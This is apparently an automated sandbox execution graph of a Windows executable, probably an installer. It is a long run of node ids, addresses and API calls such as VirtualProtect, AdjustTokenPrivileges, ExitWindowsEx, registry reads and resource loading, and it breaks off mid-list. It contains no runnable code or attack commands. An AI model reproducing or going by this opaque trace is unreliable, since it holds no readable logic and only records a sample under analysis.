                                                                                        execution_graph 5451 407548 5452 407554 CloseHandle 5451->5452 5453 40755d 5451->5453 5452->5453 6688 402b48 RaiseException 5893 407749 5894 4076dc WriteFile 5893->5894 5899 407724 5893->5899 5895 4076e8 5894->5895 5896 4076ef 5894->5896 5897 40748c 35 API calls 5895->5897 5898 407700 5896->5898 5900 4073ec 34 API calls 5896->5900 5897->5896 5899->5893 5901 4077e0 5899->5901 5900->5898 5902 4078db InterlockedExchange 5901->5902 5904 407890 5901->5904 5903 4078e7 5902->5903 6689 40294a 6690 402952 6689->6690 6691 403554 4 API calls 6690->6691 6692 402967 6690->6692 6691->6690 6693 403f4a 6694 403f53 6693->6694 6695 403f5c 6693->6695 6697 403f07 6694->6697 6700 403f09 6697->6700 6699 403f3c 6699->6695 6702 403e9c 6700->6702 6703 403154 4 API calls 6700->6703 6707 403f3d 6700->6707 6720 403e9c 6700->6720 6701 403ef2 6705 402674 4 API calls 6701->6705 6702->6699 6702->6701 6709 403ea9 6702->6709 6711 403e8e 6702->6711 6703->6700 6708 403ecf 6705->6708 6707->6695 6708->6695 6709->6708 6710 402674 4 API calls 6709->6710 6710->6708 6712 403e4c 6711->6712 6713 403e67 6712->6713 6714 403e62 6712->6714 6715 403e7b 6712->6715 6718 403e78 6713->6718 6719 402674 4 API calls 6713->6719 6717 403cc8 4 API calls 6714->6717 6716 402674 4 API calls 6715->6716 6716->6718 6717->6713 6718->6701 6718->6709 6719->6718 6721 403ed7 6720->6721 6726 403ea9 6720->6726 6722 403ef2 6721->6722 6723 403e8e 4 API calls 6721->6723 6724 402674 4 API calls 6722->6724 6725 403ee6 6723->6725 6728 403ecf 6724->6728 6725->6722 6725->6726 6727 402674 4 API calls 6726->6727 6726->6728 6727->6728 6728->6700 6247 40ac4f 6248 40abc1 6247->6248 6249 4094d8 9 API calls 6248->6249 6251 40abed 6248->6251 6249->6251 6250 40ac06 6252 40ac1a 6250->6252 6253 40ac0f DestroyWindow 6250->6253 6251->6250 6254 40ac00 RemoveDirectoryA 6251->6254 6255 40ac42 6252->6255 6256 40357c 4 API calls 6252->6256 6253->6252 6254->6250 6257 40ac38 6256->6257 6258 4025ac 4 API calls 6257->6258 6258->6255 6259 403a52 6260 403a5a WriteFile 6259->6260 6262 403a74 6259->6262 6261 403a78 GetLastError 6260->6261 6260->6262 6261->6262 6263 402654 6264 403154 4 API calls 6263->6264 6265 402614 6264->6265 6266 402632 6265->6266 6267 403154 4 API calls 6265->6267 6267->6266 6268 40ac56 6269 40ac5d 6268->6269 6271 40ac88 6268->6271 6278 409448 6269->6278 6273 403198 4 API calls 6271->6273 6272 40ac62 6272->6271 6275 40ac80 MessageBoxA 6272->6275 6274 40acc0 6273->6274 6276 403198 4 API calls 6274->6276 6275->6271 6277 40acc8 6276->6277 6279 409454 GetCurrentProcess OpenProcessToken 6278->6279 6280 4094af ExitWindowsEx 6278->6280 6281 409466 6279->6281 6282 40946a LookupPrivilegeValueA AdjustTokenPrivileges GetLastError 6279->6282 6280->6281 6281->6272 6282->6280 6282->6281 6737 40995e 6738 409960 6737->6738 6739 409982 6738->6739 6740 40999e CallWindowProcA 6738->6740 6740->6739 6741 409960 6742 409982 6741->6742 6743 40996f 6741->6743 6743->6742 6744 40999e CallWindowProcA 6743->6744 6744->6742 6745 405160 6746 405173 6745->6746 6747 404e58 33 API calls 6746->6747 6748 405187 6747->6748 6283 402e64 6284 402e69 6283->6284 6285 402e7a RtlUnwind 6284->6285 6286 402e5e 6284->6286 6287 402e9d 6285->6287 5905 40766c SetFilePointer 5906 4076a3 5905->5906 5907 407693 GetLastError 5905->5907 5907->5906 5908 40769c 5907->5908 5909 40748c 35 API calls 5908->5909 5909->5906 6300 40667c IsDBCSLeadByte 6301 406694 6300->6301 6761 403f7d 6762 403fa2 6761->6762 6763 403f84 6761->6763 6762->6763 6765 403e8e 4 API calls 6762->6765 6764 403f8c 6763->6764 6766 402674 4 API calls 6763->6766 6765->6763 6767 403fca 6766->6767 6768 403d02 6770 403d12 6768->6770 6769 403ddf ExitProcess 6770->6769 6771 403db8 6770->6771 6774 403dea 6770->6774 6778 403da4 6770->6778 6779 403d8f MessageBoxA 6770->6779 6772 403cc8 4 API calls 6771->6772 6773 403dc2 6772->6773 6775 403cc8 4 API calls 6773->6775 6776 403dcc 6775->6776 6788 4019dc 6776->6788 6784 403fe4 6778->6784 6779->6771 6780 403dd1 6780->6769 6780->6774 6785 403fe8 6784->6785 6786 403f07 4 API calls 6785->6786 6787 404006 6786->6787 6789 401abb 6788->6789 6790 4019ed 6788->6790 6789->6780 6791 401a04 RtlEnterCriticalSection 6790->6791 6792 401a0e LocalFree 6790->6792 6791->6792 6793 401a41 6792->6793 6794 401a2f VirtualFree 6793->6794 6795 401a49 6793->6795 6794->6793 6796 401a70 LocalFree 6795->6796 6797 401a87 6795->6797 6796->6796 6796->6797 6798 401aa9 RtlDeleteCriticalSection 6797->6798 6799 401a9f RtlLeaveCriticalSection 6797->6799 6798->6780 6799->6798 6306 404206 6307 4041cc 6306->6307 6308 40420a 6306->6308 6309 403154 4 API calls 6308->6309 6310 404282 6308->6310 6311 404323 6309->6311 6312 402c08 6313 402c82 6312->6313 6316 402c19 6312->6316 6314 402c56 RtlUnwind 6315 403154 4 API calls 6314->6315 6315->6313 6316->6313 6316->6314 6319 402b28 6316->6319 6320 402b31 RaiseException 6319->6320 6321 402b47 6319->6321 6320->6321 6321->6314 6322 408c10 6323 408c17 6322->6323 6324 403198 4 API calls 6323->6324 6332 408cb1 6324->6332 6325 408cdc 6326 4031b8 4 API calls 6325->6326 6327 408d69 6326->6327 6328 408cc8 6330 4032fc 18 API calls 6328->6330 6329 403278 18 API calls 6329->6332 6330->6325 6331 4032fc 18 API calls 6331->6332 6332->6325 6332->6328 6332->6329 6332->6331 6337 40a814 6338 40a839 6337->6338 6339 40993c 29 API calls 6338->6339 6342 40a83e 6339->6342 6340 40a891 6371 4026c4 GetSystemTime 6340->6371 6342->6340 6345 408dd8 18 API calls 6342->6345 6343 40a896 6344 409330 46 API calls 6343->6344 6346 40a89e 6344->6346 6347 40a86d 6345->6347 6348 4031e8 18 API calls 6346->6348 6351 40a875 MessageBoxA 6347->6351 6349 40a8ab 6348->6349 6350 406928 19 API calls 6349->6350 6352 40a8b8 6350->6352 6351->6340 6353 40a882 6351->6353 6354 4066c0 19 API calls 6352->6354 6355 405864 19 API calls 6353->6355 6356 40a8c8 6354->6356 6355->6340 6357 406638 19 API calls 6356->6357 6358 40a8d9 6357->6358 6359 403340 18 API calls 6358->6359 6360 40a8e7 6359->6360 6361 4031e8 18 API calls 6360->6361 6362 40a8f7 6361->6362 6363 4074e0 37 API calls 6362->6363 6364 40a936 6363->6364 6365 402594 18 API calls 6364->6365 6366 40a956 6365->6366 6367 407a28 19 API calls 6366->6367 6368 40a998 6367->6368 6369 407cb8 35 API calls 6368->6369 6370 40a9bf 6369->6370 6371->6343 5449 407017 5450 407008 SetErrorMode 5449->5450 6372 403018 6373 403070 6372->6373 6374 403025 6372->6374 6375 40302a RtlUnwind 6374->6375 6376 40304e 6375->6376 6378 402f78 6376->6378 6379 402be8 6376->6379 6380 402bf1 RaiseException 6379->6380 6381 402c04 6379->6381 6380->6381 6381->6373 6386 40901e 6387 409010 6386->6387 6388 408fac Wow64RevertWow64FsRedirection 6387->6388 6389 409018 6388->6389 6390 409020 SetLastError 6391 409029 6390->6391 6406 403a28 ReadFile 6407 403a46 6406->6407 6408 403a49 GetLastError 6406->6408 5910 40762c ReadFile 5911 407663 5910->5911 5912 40764c 5910->5912 5913 407652 GetLastError 5912->5913 5914 40765c 5912->5914 5913->5911 5913->5914 5915 40748c 35 API calls 5914->5915 5915->5911 6810 40712e 6811 407118 6810->6811 6812 403198 4 API calls 6811->6812 6813 407120 6812->6813 6814 403198 4 API calls 6813->6814 6815 407128 6814->6815 5930 40a82f 5931 409ae8 18 API calls 5930->5931 5932 40a834 5931->5932 5933 40a839 5932->5933 5934 402f24 5 API calls 5932->5934 5967 40993c 5933->5967 5934->5933 5936 40a891 5972 4026c4 GetSystemTime 5936->5972 5938 40a83e 5938->5936 6033 408dd8 5938->6033 5939 40a896 5973 409330 5939->5973 5943 40a86d 5947 40a875 MessageBoxA 5943->5947 5944 4031e8 18 API calls 5945 40a8ab 5944->5945 5991 406928 5945->5991 5947->5936 5949 40a882 5947->5949 6036 405864 5949->6036 5954 40a8d9 6018 403340 5954->6018 5956 40a8e7 5957 4031e8 18 API calls 5956->5957 5958 40a8f7 5957->5958 5959 4074e0 37 API calls 5958->5959 5960 40a936 5959->5960 5961 402594 18 API calls 5960->5961 5962 40a956 5961->5962 5963 407a28 19 API calls 5962->5963 5964 40a998 5963->5964 5965 407cb8 35 API calls 5964->5965 5966 40a9bf 5965->5966 6040 40953c 5967->6040 5970 4098cc 19 API calls 5971 40995c 5970->5971 5971->5938 5972->5939 5976 409350 5973->5976 5977 409375 CreateDirectoryA 5976->5977 5981 408dd8 18 API calls 5976->5981 5983 404c94 33 API calls 5976->5983 5986 407284 19 API calls 5976->5986 5989 408da8 18 API calls 5976->5989 5990 405890 18 API calls 5976->5990 6096 406cf4 5976->6096 6119 409224 5976->6119 5978 4093ed 5977->5978 5979 40937f GetLastError 5977->5979 5980 40322c 4 API calls 5978->5980 5979->5976 5982 4093f7 5980->5982 5981->5976 5984 4031b8 4 API calls 5982->5984 5983->5976 5985 409411 5984->5985 5987 4031b8 4 API calls 5985->5987 5986->5976 5988 40941e 5987->5988 5988->5944 5989->5976 5990->5976 6225 406820 5991->6225 5994 403454 18 API calls 5995 40694a 5994->5995 5996 4066c0 5995->5996 6230 4068e4 5996->6230 5999 4066f0 6002 403340 18 API calls 5999->6002 6000 4066fe 6001 403454 18 API calls 6000->6001 6003 406711 6001->6003 6004 4066fc 6002->6004 6005 403340 18 API calls 6003->6005 6006 403198 4 API calls 6004->6006 6005->6004 6007 406733 6006->6007 6008 406638 6007->6008 6009 406642 6008->6009 6010 406665 6008->6010 6236 406950 6009->6236 6012 40322c 4 API calls 6010->6012 6014 40666e 6012->6014 6013 406649 6013->6010 6015 406654 6013->6015 6014->5954 6016 403340 18 API calls 6015->6016 6017 406662 6016->6017 6017->5954 6019 403344 6018->6019 6020 4033a5 6018->6020 6021 4031e8 6019->6021 6022 40334c 6019->6022 6026 403254 18 API calls 6021->6026 6028 4031fc 6021->6028 6022->6020 6024 40335b 6022->6024 6027 4031e8 18 API calls 6022->6027 6023 403228 6023->5956 6025 403254 18 API calls 6024->6025 6030 403375 6025->6030 6026->6028 6027->6024 6028->6023 6029 4025ac 4 API calls 6028->6029 6029->6023 6031 4031e8 18 API calls 6030->6031 6032 4033a1 6031->6032 6032->5956 6034 408da8 18 API calls 6033->6034 6035 408df4 6034->6035 6035->5943 6037 405869 6036->6037 6038 405940 19 API calls 6037->6038 6039 40587b 6038->6039 6039->6039 6046 40955b 6040->6046 6041 409590 6043 40959d GetUserDefaultLangID 6041->6043 6048 409592 6041->6048 6042 409594 6052 407024 GetModuleHandleA GetProcAddress 6042->6052 6043->6048 6046->6041 6046->6042 6047 40956f 6046->6047 6047->5970 6048->6047 6049 4095cb GetACP 6048->6049 6050 4095ef 6048->6050 6049->6047 6049->6048 6050->6047 6051 409615 GetACP 6050->6051 6051->6047 6051->6050 6053 407067 6052->6053 6054 40705e 6052->6054 6055 407070 6053->6055 6056 4070a8 6053->6056 6063 403198 4 API calls 6054->6063 6073 406f68 6055->6073 6057 406f68 RegOpenKeyExA 6056->6057 6061 4070c1 6057->6061 6059 407089 6060 4070de 6059->6060 6076 406f5c 6059->6076 6065 40322c 4 API calls 6060->6065 6061->6060 6064 406f5c 20 API calls 6061->6064 6067 407120 6063->6067 6068 4070d5 RegCloseKey 6064->6068 6069 4070eb 6065->6069 6070 403198 4 API calls 6067->6070 6068->6060 6071 4032fc 18 API calls 6069->6071 6072 407128 6070->6072 6071->6054 6072->6048 6074 406f73 6073->6074 6075 406f79 RegOpenKeyExA 6073->6075 6074->6075 6075->6059 6079 406e10 6076->6079 6080 406e36 RegQueryValueExA 6079->6080 6085 406e7b 6080->6085 6087 406e59 6080->6087 6081 406e73 6083 403198 4 API calls 6081->6083 6082 403198 4 API calls 6084 406f47 RegCloseKey 6082->6084 6083->6085 6084->6060 6085->6082 6086 403278 18 API calls 6086->6087 6087->6081 6087->6085 6087->6086 6088 403420 18 API calls 6087->6088 6089 406eb0 RegQueryValueExA 6088->6089 6089->6080 6090 406ecc 6089->6090 6090->6085 6091 4034f0 18 API calls 6090->6091 6092 406f0e 6091->6092 6093 406f20 6092->6093 6095 403420 18 API calls 6092->6095 6094 4031e8 18 API calls 6093->6094 6094->6085 6095->6093 6138 406a58 6096->6138 6099 406d26 6101 406a58 19 API calls 6099->6101 6103 406d72 6099->6103 6102 406d36 6101->6102 6104 406d42 6102->6104 6107 406a34 21 API calls 6102->6107 6146 406888 6103->6146 6104->6103 6105 406d67 6104->6105 6108 406a58 19 API calls 6104->6108 6105->6103 6158 406cc8 GetWindowsDirectoryA 6105->6158 6107->6104 6111 406d5b 6108->6111 6111->6105 6114 406a34 21 API calls 6111->6114 6112 406638 19 API calls 6113 406d87 6112->6113 6115 40322c 4 API calls 6113->6115 6114->6105 6116 406d91 6115->6116 6117 4031b8 4 API calls 6116->6117 6118 406dab 6117->6118 6118->5976 6120 409244 6119->6120 6121 406638 19 API calls 6120->6121 6122 40925d 6121->6122 6123 40322c 4 API calls 6122->6123 6130 409268 6123->6130 6124 406978 20 API calls 6124->6130 6126 408dd8 18 API calls 6126->6130 6127 4033b4 18 API calls 6127->6130 6128 405890 18 API calls 6128->6130 6130->6124 6130->6126 6130->6127 6130->6128 6131 4092e4 6130->6131 6198 4091b0 6130->6198 6206 409034 6130->6206 6132 40322c 4 API calls 6131->6132 6133 4092ef 6132->6133 6134 4031b8 4 API calls 6133->6134 6135 409309 6134->6135 6136 403198 4 API calls 6135->6136 6137 409311 6136->6137 6137->5976 6139 4034f0 18 API calls 6138->6139 6140 406a6b 6139->6140 6141 406a82 GetEnvironmentVariableA 6140->6141 6145 406a95 6140->6145 6160 406dec 6140->6160 6141->6140 6142 406a8e 6141->6142 6143 403198 4 API calls 6142->6143 6143->6145 6145->6099 6155 406a34 6145->6155 6147 403414 6146->6147 6148 4068ab GetFullPathNameA 6147->6148 6149 4068b7 6148->6149 6150 4068ce 6148->6150 6149->6150 6151 4068bf 6149->6151 6152 40322c 4 API calls 6150->6152 6153 403278 18 API calls 6151->6153 6154 4068cc 6152->6154 6153->6154 6154->6112 6164 4069dc 6155->6164 6159 406ce9 6158->6159 6159->6103 6161 406dfa 6160->6161 6162 4034f0 18 API calls 6161->6162 6163 406e08 6162->6163 6163->6140 6171 406978 6164->6171 6166 4069fe 6167 406a06 GetFileAttributesA 6166->6167 6168 406a1b 6167->6168 6169 403198 4 API calls 6168->6169 6170 406a23 6169->6170 6170->6099 6181 406744 6171->6181 6173 4069b0 6176 4069c6 6173->6176 6177 4069bb 6173->6177 6175 406989 6175->6173 6188 406970 CharPrevA 6175->6188 6189 403454 6176->6189 6178 40322c 4 API calls 6177->6178 6180 4069c4 6178->6180 6180->6166 6182 406755 6181->6182 6183 4067b9 6182->6183 6187 406773 6182->6187 6184 406680 IsDBCSLeadByte 6183->6184 6185 4067b4 6183->6185 6184->6185 6185->6175 6187->6185 6196 406680 IsDBCSLeadByte 6187->6196 6188->6175 6190 403486 6189->6190 6191 403459 6189->6191 6192 403198 4 API calls 6190->6192 6191->6190 6194 40346d 6191->6194 6193 40347c 6192->6193 6193->6180 6195 403278 18 API calls 6194->6195 6195->6193 6197 406694 6196->6197 6197->6187 6199 403198 4 API calls 6198->6199 6201 4091d1 6199->6201 6203 4091fe 6201->6203 6215 4032a8 6201->6215 6218 403494 6201->6218 6204 403198 4 API calls 6203->6204 6205 409213 6204->6205 6205->6130 6207 408f70 2 API calls 6206->6207 6208 40904a 6207->6208 6209 40904e 6208->6209 6222 406a48 6208->6222 6209->6130 6212 409081 6213 408fac Wow64RevertWow64FsRedirection 6212->6213 6214 409089 6213->6214 6214->6130 6216 403278 18 API calls 6215->6216 6217 4032b5 6216->6217 6217->6201 6219 403498 6218->6219 6221 4034c3 6218->6221 6220 4034f0 18 API calls 6219->6220 6220->6221 6221->6201 6223 4069dc 21 API calls 6222->6223 6224 406a52 GetLastError 6223->6224 6224->6212 6226 406744 IsDBCSLeadByte 6225->6226 6228 406835 6226->6228 6227 40687f 6227->5994 6228->6227 6229 406680 IsDBCSLeadByte 6228->6229 6229->6228 6231 4068f3 6230->6231 6232 406820 IsDBCSLeadByte 6231->6232 6235 4068fe 6232->6235 6233 4066ea 6233->5999 6233->6000 6234 406680 IsDBCSLeadByte 6234->6235 6235->6233 6235->6234 6237 406957 6236->6237 6238 40695b 6236->6238 6237->6013 6241 406970 CharPrevA 6238->6241 6240 40696c 6240->6013 6241->6240 6816 408f30 6819 408dfc 6816->6819 6820 408e05 6819->6820 6821 403198 4 API calls 6820->6821 6822 408e13 6820->6822 6821->6820 6823 403932 6824 403924 6823->6824 6825 40374c VariantClear 6824->6825 6826 40392c 6825->6826 5386 4075c4 SetFilePointer 5387 4075f7 5386->5387 5388 4075e7 GetLastError 5386->5388 5388->5387 5389 4075f0 5388->5389 5391 40748c GetLastError 5389->5391 5394 4073ec 5391->5394 5395 407284 19 API calls 5394->5395 5397 407414 5395->5397 5396 407434 5399 405890 18 API calls 5396->5399 5397->5396 5398 405194 33 API calls 5397->5398 5398->5396 5400 407443 5399->5400 5401 403198 4 API calls 5400->5401 5402 407460 5401->5402 5402->5387 6417 4076c8 WriteFile 6418 4076e8 6417->6418 6421 4076ef 6417->6421 6419 40748c 35 API calls 6418->6419 6419->6421 6420 407700 6421->6420 6422 4073ec 34 API calls 6421->6422 6422->6420 6423 402ccc 6426 402cfe 6423->6426 6427 402cdd 6423->6427 6424 402d88 RtlUnwind 6425 403154 4 API calls 6424->6425 6425->6426 6427->6424 6427->6426 6428 402b28 RaiseException 6427->6428 6429 402d7f 6428->6429 6429->6424 6835 403fcd 6836 403f07 4 API calls 6835->6836 6837 403fd6 6836->6837 6838 403e9c 4 API calls 6837->6838 6839 403fe2 6838->6839 6436 4024d0 6437 4024e4 6436->6437 6438 4024e9 6436->6438 6441 401918 4 API calls 6437->6441 6439 402518 6438->6439 6440 40250e RtlEnterCriticalSection 6438->6440 6443 4024ed 6438->6443 6451 402300 6439->6451 6440->6439 6441->6438 6444 402525 6447 402581 6444->6447 6448 402577 RtlLeaveCriticalSection 6444->6448 6446 401fd4 14 API calls 6449 402531 6446->6449 6448->6447 6449->6444 6450 40215c 9 API calls 6449->6450 6450->6444 6452 402314 6451->6452 6454 4023b8 6452->6454 6455 402335 6452->6455 6453 402344 6453->6444 6453->6446 6454->6453 6456 401d80 9 API calls 6454->6456 6459 402455 6454->6459 6461 401e84 6454->6461 6455->6453 6457 401b74 9 API calls 6455->6457 6456->6454 6457->6453 6459->6453 6460 401d00 9 API calls 6459->6460 6460->6453 6466 401768 6461->6466 6463 401e99 6464 401ea6 6463->6464 6465 401dcc 9 API calls 6463->6465 6464->6454 6465->6464 6468 401787 6466->6468 6467 401494 LocalAlloc VirtualAlloc VirtualAlloc VirtualFree 6467->6468 6468->6467 6469 40183b 6468->6469 6470 40132c LocalAlloc 6468->6470 6472 401821 6468->6472 6474 4017d6 6468->6474 6471 4015c4 VirtualAlloc 6469->6471 6475 4017e7 6469->6475 6470->6468 6471->6475 6473 40150c VirtualFree 6472->6473 6473->6475 6476 40150c VirtualFree 6474->6476 6475->6463 6476->6475 6477 4028d2 6478 4028da 6477->6478 6479 403554 4 API calls 6478->6479 6480 4028ef 6478->6480 6479->6478 6481 4025ac 4 API calls 6480->6481 6482 4028f4 6481->6482 6840 4019d3 6841 4019ba 6840->6841 6842 4019c3 RtlLeaveCriticalSection 6841->6842 6843 4019cd 6841->6843 6842->6843 5403 407fd4 5404 407fe6 5403->5404 5405 407fed 5403->5405 5414 407f10 5404->5414 5407 408021 5405->5407 5408 408015 5405->5408 5409 408017 5405->5409 5410 40804e 5407->5410 5412 407d7c 33 API calls 5407->5412 5428 407e2c 5408->5428 5425 407d7c 5409->5425 5412->5410 5415 407f25 5414->5415 5416 407d7c 33 API calls 5415->5416 5417 407f34 5415->5417 5416->5417 5418 407f6e 5417->5418 5419 407d7c 33 API calls 5417->5419 5420 407f82 5418->5420 5421 407d7c 33 API calls 5418->5421 5419->5418 5424 407fae 5420->5424 5435 407eb8 5420->5435 5421->5420 5424->5405 5438 4058c4 5425->5438 5427 407d9e 5427->5407 5429 405194 33 API calls 5428->5429 5430 407e57 5429->5430 5446 407de4 5430->5446 5432 407e5f 5433 403198 4 API calls 5432->5433 5434 407e74 5433->5434 5434->5407 5436 407ec7 VirtualFree 5435->5436 5437 407ed9 VirtualAlloc 5435->5437 5436->5437 5437->5424 5440 4058d0 5438->5440 5439 405194 33 API calls 5441 4058fd 5439->5441 5440->5439 5442 4031e8 18 API calls 5441->5442 5443 405908 5442->5443 5444 403198 4 API calls 5443->5444 5445 40591d 5444->5445 5445->5427 5447 4058c4 33 API calls 5446->5447 5448 407e06 5447->5448 5448->5432 6483 405ad4 6484 405ae4 6483->6484 6485 405adc 6483->6485 6486 405ae2 6485->6486 6487 405aeb 6485->6487 6490 405a4c 6486->6490 6488 405940 19 API calls 6487->6488 6488->6484 6491 405a54 6490->6491 6492 405a6e 6491->6492 6493 403154 4 API calls 6491->6493 6494 405a73 6492->6494 6495 405a8a 6492->6495 6493->6491 6496 405940 19 API calls 6494->6496 6497 403154 4 API calls 6495->6497 6498 405a86 6496->6498 6499 405a8f 6497->6499 6501 403154 4 API calls 6498->6501 6500 4059b0 33 API calls 6499->6500 6500->6498 6502 405ab8 6501->6502 6503 403154 4 API calls 6502->6503 6504 405ac6 6503->6504 6504->6484 5916 40a9de 5917 40aa03 5916->5917 5918 407918 InterlockedExchange 5917->5918 5919 40aa2d 5918->5919 5920 40aa3d 5919->5920 5921 409ae8 18 API calls 5919->5921 5926 4076ac SetEndOfFile 5920->5926 5921->5920 5923 40aa59 5924 4025ac 4 API calls 5923->5924 5925 40aa90 5924->5925 5927 4076c3 5926->5927 5928 4076bc 5926->5928 5927->5923 5929 40748c 35 API calls 5928->5929 5929->5927 6847 402be9 RaiseException 6848 402c04 6847->6848 6515 402af2 6516 402afe 6515->6516 6519 402ed0 6516->6519 6520 403154 4 API calls 6519->6520 6521 402ee0 6520->6521 6522 402b03 6521->6522 6524 402b0c 6521->6524 6525 402b25 6524->6525 6526 402b15 RaiseException 6524->6526 6525->6522 6526->6525 5454 40a5f8 5497 4030dc 5454->5497 5456 40a60e 5500 4042e8 5456->5500 5458 40a613 5503 40457c GetModuleHandleA GetProcAddress 5458->5503 5462 40a61d 5511 4065c8 5462->5511 5464 40a622 5520 4090a4 GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress 5464->5520 5471 40a665 5542 406c2c 5471->5542 5475 4031e8 18 API calls 5476 40a683 5475->5476 5556 4074e0 5476->5556 5482 407918 InterlockedExchange 5484 40a6d2 5482->5484 5483 40a710 5576 4074a0 5483->5576 5484->5483 5613 409ae8 5484->5613 5486 40a751 5580 407a28 5486->5580 5487 40a736 5487->5486 5488 409ae8 18 API calls 5487->5488 5488->5486 5490 40a776 5590 408b08 5490->5590 5494 40a7bc 5495 408b08 35 API calls 5494->5495 5496 40a7f5 5494->5496 5495->5494 5623 403094 5497->5623 5499 4030e1 GetModuleHandleA GetCommandLineA 5499->5456 5501 403154 4 API calls 5500->5501 5502 404323 5500->5502 5501->5502 5502->5458 5504 404598 5503->5504 5505 40459f GetProcAddress 5503->5505 5504->5505 5506 4045b5 GetProcAddress 5505->5506 5507 4045ae 5505->5507 5508 4045c4 SetProcessDEPPolicy 5506->5508 5509 4045c8 5506->5509 5507->5506 5508->5509 5510 404624 6F551CD0 5509->5510 5510->5462 5624 405ca8 5511->5624 5521 4090f7 5520->5521 5708 406fa0 SetErrorMode 5521->5708 5524 407284 19 API calls 5525 409127 5524->5525 5526 403198 4 API calls 5525->5526 5527 40913c 5526->5527 5528 409b78 GetSystemInfo VirtualQuery 5527->5528 5529 409ba2 5528->5529 5530 409c2c 5528->5530 5529->5530 5531 409c0d VirtualQuery 5529->5531 5532 409bcc VirtualProtect 5529->5532 5533 409bfb VirtualProtect 5529->5533 5534 409768 5530->5534 5531->5529 5531->5530 5532->5529 5533->5531 5714 406bd0 GetCommandLineA 5534->5714 5536 409850 5537 4031b8 4 API calls 5536->5537 5539 40986a 5537->5539 5538 406c2c 20 API calls 5540 409785 5538->5540 5539->5471 5606 409c88 5539->5606 5540->5536 5540->5538 5541 403454 18 API calls 5540->5541 5541->5540 5543 406c53 GetModuleFileNameA 5542->5543 5544 406c77 GetCommandLineA 5542->5544 5545 403278 18 API calls 5543->5545 5552 406c7c 5544->5552 5546 406c75 5545->5546 5550 406ca4 5546->5550 5547 406c81 5548 403198 4 API calls 5547->5548 5551 406c89 5548->5551 5549 406af0 18 API calls 5549->5552 5553 403198 4 API calls 5550->5553 5554 40322c 4 API calls 5551->5554 5552->5547 5552->5549 5552->5551 5555 406cb9 5553->5555 5554->5550 5555->5475 5557 4074ea 5556->5557 5721 407576 5557->5721 5724 407578 5557->5724 5558 407516 5559 40752a 5558->5559 5560 40748c 35 API calls 5558->5560 5563 409c34 FindResourceA 5559->5563 5560->5559 5564 409c49 5563->5564 5565 409c4e SizeofResource 5563->5565 5566 409ae8 18 API calls 5564->5566 5567 409c60 LoadResource 5565->5567 5568 409c5b 5565->5568 5566->5565 5570 409c73 LockResource 5567->5570 5571 409c6e 5567->5571 5569 409ae8 18 API calls 5568->5569 5569->5567 5573 409c84 5570->5573 5574 409c7f 5570->5574 5572 409ae8 18 API calls 5571->5572 5572->5570 5573->5482 5573->5484 5575 409ae8 18 API calls 5574->5575 5575->5573 5577 4074b4 5576->5577 5578 4074c4 5577->5578 5579 4073ec 34 API calls 5577->5579 5578->5487 5579->5578 5581 407a35 5580->5581 5582 405890 18 API calls 5581->5582 5583 407a89 5581->5583 5582->5583 5584 407918 InterlockedExchange 5583->5584 5585 407a9b 5584->5585 5586 405890 18 API calls 5585->5586 5587 407ab1 5585->5587 5586->5587 5588 405890 18 API calls 5587->5588 5589 407af4 5587->5589 5588->5589 5589->5490 5592 408b39 5590->5592 5597 408b82 5590->5597 5591 408bcd 5727 407cb8 5591->5727 5595 4034f0 18 API calls 5592->5595 5592->5597 5600 403420 18 API calls 5592->5600 5601 4031e8 18 API calls 5592->5601 5605 407cb8 35 API calls 5592->5605 5594 407cb8 35 API calls 5594->5597 5595->5592 5596 408be4 5599 4031b8 4 API calls 5596->5599 5597->5591 5597->5594 5598 4034f0 18 API calls 5597->5598 5603 403420 18 API calls 5597->5603 5604 4031e8 18 API calls 5597->5604 5598->5597 5602 408bfe 5599->5602 5600->5592 5601->5592 5620 404c20 5602->5620 5603->5597 5604->5597 5605->5592 5607 40322c 4 API calls 5606->5607 5608 409cab 5607->5608 5609 409cba MessageBoxA 5608->5609 5610 409ccf 5609->5610 5611 403198 4 API calls 5610->5611 5612 409cd7 5611->5612 5612->5471 5614 409af1 5613->5614 5615 409b09 5613->5615 5617 405890 18 API calls 5614->5617 5616 405890 18 API calls 5615->5616 5618 409b1a 5616->5618 5619 409b03 5617->5619 5618->5483 5619->5483 5749 402594 5620->5749 5622 404c2b 5622->5494 5623->5499 5625 405940 19 API calls 5624->5625 5626 405cb9 5625->5626 5627 405280 GetSystemDefaultLCID 5626->5627 5631 4052b6 5627->5631 5628 404cdc 19 API calls 5628->5631 5629 40520c 19 API calls 5629->5631 5630 4031e8 18 API calls 5630->5631 5631->5628 5631->5629 5631->5630 5635 405318 5631->5635 5632 404cdc 19 API calls 5632->5635 5633 40520c 19 API calls 5633->5635 5634 4031e8 18 API calls 5634->5635 5635->5632 5635->5633 5635->5634 5636 40539b 5635->5636 5637 4031b8 4 API calls 5636->5637 5638 4053b5 5637->5638 5639 4053c4 GetSystemDefaultLCID 5638->5639 5696 40520c GetLocaleInfoA 5639->5696 5642 4031e8 18 API calls 5643 405404 5642->5643 5644 40520c 19 API calls 5643->5644 5645 405419 5644->5645 5646 40520c 19 API calls 5645->5646 5647 40543d 5646->5647 5702 405258 GetLocaleInfoA 5647->5702 5650 405258 GetLocaleInfoA 5651 40546d 5650->5651 5652 40520c 19 API calls 5651->5652 5653 405487 5652->5653 5654 405258 GetLocaleInfoA 5653->5654 5655 4054a4 5654->5655 5656 40520c 19 API calls 5655->5656 5657 4054be 5656->5657 5658 4031e8 18 API calls 5657->5658 5659 4054cb 5658->5659 5660 40520c 19 API calls 5659->5660 5661 4054e0 5660->5661 5662 4031e8 18 API calls 5661->5662 5663 4054ed 5662->5663 5664 405258 GetLocaleInfoA 5663->5664 5665 4054fb 5664->5665 5666 40520c 19 API calls 5665->5666 5667 405515 5666->5667 5668 4031e8 18 API calls 5667->5668 5669 405522 5668->5669 5670 40520c 19 API calls 5669->5670 5671 405537 5670->5671 5672 4031e8 18 API calls 5671->5672 5673 405544 5672->5673 5674 40520c 19 API calls 5673->5674 5675 405559 5674->5675 5676 405576 5675->5676 5677 405567 5675->5677 5679 40322c 4 API calls 5676->5679 5704 40322c 5677->5704 5680 405574 5679->5680 5681 40520c 19 API calls 5680->5681 5682 405598 5681->5682 5683 4055b5 5682->5683 5684 4055a6 5682->5684 5686 403198 4 API calls 5683->5686 5685 40322c 4 API calls 5684->5685 5687 4055b3 5685->5687 5686->5687 5688 4033b4 18 API calls 5687->5688 5689 4055d7 5688->5689 5690 4033b4 18 API calls 5689->5690 5691 4055f1 5690->5691 5692 4031b8 4 API calls 5691->5692 5693 